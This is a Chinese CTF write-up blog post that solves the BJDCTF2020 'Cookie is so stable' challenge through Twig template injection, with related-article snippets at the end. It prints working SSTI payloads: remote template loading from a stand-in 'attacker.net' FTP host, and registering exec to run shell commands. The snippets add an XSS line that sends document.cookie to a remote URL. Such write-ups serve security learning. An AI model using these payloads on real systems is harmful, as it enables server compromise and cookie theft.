[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入

最新推荐文章于 2024-02-28 16:11:22 发布
最新推荐文章于 2024-02-28 16:11:22 发布
阅读量580 收藏 3
点赞数 1
分类专栏: # Web安全 # Write Up # 凌晨四点起床刷题 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/119013663
版权

[BJDCTF2020]Cookie is so stable

PHP-Twig模板注入

参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933

通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含

{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}

利用getFilter函数中的危险函数call_user_func,我们可以实现任意函数调用

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
// 前半段的含义为将`exec`注册为回调函数,后半段为回调参数

源码为

public function getFilter($name)
  {
    ...
    // 遍历回调函数,以$name为参数
    foreach ($this->filterCallbacks as $callback) {
    if (false !== $filter = call_user_func($callback, $name)) {
      return $filter;
    }
  }
  return false;
}

// 注册回调函数,将回调函数名封装为数组
public function registerUndefinedFilterCallback($callable)
{
  $this->filterCallbacks[] = $callable;
}

解题

提示为看Cookie,在Flag页面提交ID后,可以在存储中看到Cookie添加了新的参数,

输入的回显,首先猜测为SSTI,

测试模板,

{{7*'7'}}
回显:49

Twig注入,因此我们构造payload读文件,

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

但是提交会过滤拦截,我们仅需修改COOKIE,然后刷新即可得到flag

补充:

测试模板引擎方法:

// Smarty
a{*comment*}b

// Mako
a{*comment*}b
${"z".join("ab")}

// Jinja2
{{7*7}}
{{7*'7'}}    ->   7777777

// Twig
{{7*7}}
{{7*'7'}}    ->    49

利用HTML探测注入点:

用户输入可作为代码执行

name=Heph4es
hello,Heph4es.

name=Heph4es</body>     <!--整体作为变量传入模板,但并不存在此变量,所以无法显示-->
hello,

name=Heph4es}}</body>   <!--变量被传入,但在}}封闭,</body>逃逸为普通HTML文本-->
hello,

延展:可能的利用方式

  • 触发文件包含
  • 构造XSS
  • 触发命令执行
車鈊
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1529
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
[BJDCTF2020]Cookie is so stable 1(twig模板注入
weixin_45577185的博客
09-06 311
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
Twing模板注入 [BJDCTF2020]Cookie is so stable1
最新发布
m0_75178803的博客
02-28 434
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
Twig模板为例浅学一手SSTI
蚁景网安学院
12-17 1209
什么是SSTISSTI:开局一张图,姿势全靠ySSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPAT...
2021-07-20 [BJDCTF2020]Cookie is so stable 知识点:SSTI Twig Cookie注入
m0_51326092的博客
07-20 337
** [BJDCTF2020]Cookie is so stable ** ** 前言: ** 不得不说又是膜拜众大佬的一天,题目对于萌新来说实在是难啊,只能搜寻wp加了解知识点边学边做了o(╥﹏╥)o BUU实现题目复现,尽管题目写着cookie,但是重点却不是这 ̄□ ̄||。 知识点:SSTITwig),cookie注入 ** 前置知识: ** 主要就是需要了解SSTI,具体解决Twig的。 附上大佬的链接,以下两篇文章都比较详细的讲了不同类型的SSTI,讲的是针不搓! 一篇文章带你理解漏洞之SSTI
关于Twig
aetlypdlg_ys的博客
05-06 98
简单介绍下Twig sstiSSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入的成因是从用户获得一个输入后,经过后端脚本语言进行数据库查询,这时我们就可以构造输入语句来进行拼接,从而实现我们想要的sql语句。
Flask SSTI/沙箱逃逸的一些总结
01-20
模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
SSTI注入————phpSSTI
wwwwyyyrre的博客
06-04 802
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容。
服务端模版注入漏洞检测payload整理
weixin_30528371的博客
04-07 342
服务端模版注入漏洞产生的根源是将用户输入的数据被模版引擎解析渲染可能导致代码执行漏洞 下表涵盖了java,php,python,javascript语言中可能使用到的模版引擎,如果网站存在服务端模版注入在能回显的情况下会将验证栏的数据当模版执行,利用引擎提供的功能进行了计算大部分执行结果都会变成1522756。 模版引擎 语言 验证 代码执行 盲检测 ...
[WEB/nodejs]Nodejs知识入门和子进程
車鈊的博客
04-06 4375
文章目录入门内容Nodejs初步解构赋值事件绑定1.DOM绑定2.在JS绑定3. 绑定事件监听函数Callback回调函数子进程模块_函数child_process()参考链接 入门内容 Nodejs初步 Nodejs是在服务器端运行的JS代码,跨平台JS的运行环境, 采用V8引擎运行源代码, 利用事件驱动、非阻塞、异步I/O模型等来提高运行的性能。 使用多进程是扩展一个 Node 应用最好的方式, 被设计用来通过很多节点创建分布式应用, 这也是为什么被命名为 Node。 解构赋值 类似于解包,将对象或者数
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 2448
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
[环境搭建/Docker-Compose]vulhub漏洞靶场环境搭建/Docker容器关闭方法
車鈊的博客
06-19 2278
安装docker 在root权限下执行此命令 curl -s https://get.docker.com/ | sh //安装新版本的docker sudo apt purge --autoremove docker.io //卸载老版本的docker sudo apt install docker.io //使用Ubuntu自带的docker包管理器安装,但是一般版本比较老 docker服务可能需要手动启动:service start docker 安装docker-compose
[Web/IP]真实IP获取原理/客户端IP伪造测试
車鈊的博客
07-27 1922
真实IP获取和客户端IP伪造 近期比赛又做到了用户IP伪造的题目,想来不如就总结一下。 为什么要确认IP? 在Web应用下,部分逻辑需要确认用户的客户端IP。如对大量频繁发送危险请求的IP进行封禁。 进行用户IP确认的方法有很多,但是部分方法降低了IP获取的难度,确牺牲了安全性,产生了IP可伪造的风险。 服务器是如何确定IP的? REMOTE_ADDR 标识发出请求的主机IP地址,代表客户端IP。这个标识完全由服务器决定,除了路由之外无法伪造,通过TCP协议根据直接请求来源的远程主机确定,服务端根据请求TC
[Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)
車鈊的博客
04-06 1714
EJS _CVE-2019-10744(outputFunctionName) 在EJS引擎当中,存在一个属性opts.outputFunctionName (注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用) 读源码 ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。 【以下代码为exports.render-----调用----->handleCache】 首先调用了render的话(在我们做题时可以看到的表层函数) render调用的handl
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1697
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
vulhub靶场教程 flask/ssti
12-09
在flask/ssti教程中,我们将学习到的是Flask应用程序中的服务器端模板注入(Server-side Template Injection, SSTI)漏洞。这种漏洞的出现是由于Flask应用程序在渲染服务器端模板时没有适当的过滤和限制用户输入的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值